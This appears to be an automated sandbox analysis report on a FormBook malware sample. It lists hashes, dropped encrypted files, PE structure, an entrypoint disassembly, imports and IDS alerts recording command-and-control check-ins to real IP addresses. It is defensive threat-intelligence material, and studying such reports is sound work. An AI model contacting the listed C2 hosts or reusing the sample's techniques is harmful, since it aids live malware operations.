	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	na.elf	Get hash	malicious	Unknown	Browse	202.154.136.19
	sora.mips.elf	Get hash	malicious	Mirai	Browse	202.154.140.249
	loligang.mips-20241128-1536.elf	Get hash	malicious	Mirai	Browse	114.23.255.61
	Viridine84.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.106.67.112

Process:	C:\Windows\SysWOW64\shutdown.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut5F50.tmp

Download File

Process:	C:\Users\user\Desktop\KcSzB2IpP5.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.995541780610237
Encrypted:	true
SSDEEP:	6144:XetHfuhwDDB2K8ZD1ucJ2/UcK/AiJlLyXKvFpiU:Xet/uhGB2K0D1qK/AiJNlriU
MD5:	B71406CAE0705958C6C7E7F40329CCF8
SHA1:	85BA774AD4422AD1AF76C13D28B9B2985A5656AF
SHA-256:	511E07ED7D876752B3AB1BABA1B6BAFBF0879859302CC7B0E535174352D05ECD
SHA-512:	C3815C06F9A3880B541D92DBFFB7668E7202E0FB2848204549071F51060BF2EC1AF13FAFC9EC4D82B6E0035B6F06A077197855039B667287ED271DEF4A1025EF
Malicious:	false
Reputation:	low
Preview:	t..ID02S<4MM..KZ.PS14JQ2p5J9GXIG02S84MMCVKZLPS14JQ205J9GXIG0.S84CR.XK.E.r.5...d]#Jg(;(W@2U..,-8$.l26.F??.Y[j}..i*_V6.9@GgVKZLPS1MKX..U-.z8...R4....l+=.J...v1U./.d) .`:[\p-$.KZLPS14J.w05.8FX.;.SS84MMCVK.LRR:5AQ2f1J9GXIG02S.'MMCFKZL W14J.20%J9GZIG62S84MMCPKZLPS14J!605H9GXIG00Sx.MMSVKJLPS1$JQ"05J9GXYG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J.3=1302S.`IMCFKZL.W14ZQ205J9GXIG02S8.MM#VKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9

C:\Users\user\AppData\Local\Temp\bezzo

Download File

Process:	C:\Users\user\Desktop\KcSzB2IpP5.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.995541780610237
Encrypted:	true
SSDEEP:	6144:XetHfuhwDDB2K8ZD1ucJ2/UcK/AiJlLyXKvFpiU:Xet/uhGB2K0D1qK/AiJNlriU
MD5:	B71406CAE0705958C6C7E7F40329CCF8
SHA1:	85BA774AD4422AD1AF76C13D28B9B2985A5656AF
SHA-256:	511E07ED7D876752B3AB1BABA1B6BAFBF0879859302CC7B0E535174352D05ECD
SHA-512:	C3815C06F9A3880B541D92DBFFB7668E7202E0FB2848204549071F51060BF2EC1AF13FAFC9EC4D82B6E0035B6F06A077197855039B667287ED271DEF4A1025EF
Malicious:	false
Reputation:	low
Preview:	t..ID02S<4MM..KZ.PS14JQ2p5J9GXIG02S84MMCVKZLPS14JQ205J9GXIG0.S84CR.XK.E.r.5...d]#Jg(;(W@2U..,-8$.l26.F??.Y[j}..i*_V6.9@GgVKZLPS1MKX..U-.z8...R4....l+=.J...v1U./.d) .`:[\p-$.KZLPS14J.w05.8FX.;.SS84MMCVK.LRR:5AQ2f1J9GXIG02S.'MMCFKZL W14J.20%J9GZIG62S84MMCPKZLPS14J!605H9GXIG00Sx.MMSVKJLPS1$JQ"05J9GXYG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J.3=1302S.`IMCFKZL.W14ZQ205J9GXIG02S8.MM#VKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9GXIG02S84MMCVKZLPS14JQ205J9

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.147795976518549
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KcSzB2IpP5.exe
File size:	1'262'080 bytes
MD5:	87fc5e4dd52d2188da6023bc6a6b8ebb
SHA1:	16bba3e41ddc71f342e8bae23abe8fe263bededa
SHA256:	2d8921f5b874d74b06b9375f19d0f030a350a9edf7c56e89b21bd301b9c4ed74
SHA512:	c99651fc1a3a2fce2487605cf3a57997b2201c86f1e6e8ea732466097186d5d60e17a8924a7bca07254c1418fc8553fb919cf0f8d6069dd1444258b11a3228ba
SSDEEP:	24576:JqDEvCTbMWu7rQYlBQcBiT6rprG8aqMT2eVH/jlCxa4:JTvC/MTQYxsWR7aqinCxa
TLSH:	E345C0027391C062FF9B92334B5AF6515BBC69260123E61F13A81DBEBD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67655F6C [Fri Dec 20 12:13:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F25E07D40E3h
jmp 00007F25E07D39EFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F25E07D3BCDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F25E07D3B9Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F25E07D678Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F25E07D67D8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F25E07D67C1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x5d794	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x132000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x5d794	0x5d800	ca2bd3f9d4a1ca11ae39f53f05327535	False	0.9300870028409091	data	7.898350993794695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x132000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x54a59	data			1.0003345706679587
RT_GROUP_ICON	0x131214	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x13128c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1312a0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1312b4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1312c8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1313a4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T18:12:38.616993+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50025	3.33.130.190	80	TCP
2025-01-10T18:13:15.603180+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49896	3.33.130.190	80	TCP
2025-01-10T18:13:40.538444+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49977	13.248.169.48	80	TCP
2025-01-10T18:13:42.045528+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49978	13.248.169.48	80	TCP
2025-01-10T18:13:44.582945+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49979	13.248.169.48	80	TCP
2025-01-10T18:13:47.140360+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49980	13.248.169.48	80	TCP
2025-01-10T18:13:53.694777+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49981	47.83.1.90	80	TCP
2025-01-10T18:13:56.241584+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49982	47.83.1.90	80	TCP
2025-01-10T18:13:58.788556+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49983	47.83.1.90	80	TCP
2025-01-10T18:14:01.553375+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49984	47.83.1.90	80	TCP
2025-01-10T18:14:07.448116+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49985	103.106.67.112	80	TCP
2025-01-10T18:14:10.100815+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49986	103.106.67.112	80	TCP
2025-01-10T18:14:12.573634+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49987	103.106.67.112	80	TCP
2025-01-10T18:14:15.196530+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49988	103.106.67.112	80	TCP
2025-01-10T18:14:29.880052+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49989	103.23.149.28	80	TCP
2025-01-10T18:14:32.491712+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49990	103.23.149.28	80	TCP
2025-01-10T18:14:35.226045+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49991	103.23.149.28	80	TCP
2025-01-10T18:14:37.804648+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49992	103.23.149.28	80	TCP
2025-01-10T18:14:51.588067+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49993	162.0.236.169	80	TCP
2025-01-10T18:14:54.184545+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49994	162.0.236.169	80	TCP
2025-01-10T18:14:56.802464+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49995	162.0.236.169	80	TCP
2025-01-10T18:14:59.234035+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	49996	162.0.236.169	80	TCP
2025-01-10T18:15:04.780218+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49997	13.248.169.48	80	TCP
2025-01-10T18:15:07.313900+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49998	13.248.169.48	80	TCP
2025-01-10T18:15:09.874067+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.10	49999	13.248.169.48	80	TCP
2025-01-10T18:15:17.407134+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.10	50000	13.248.169.48	80	TCP
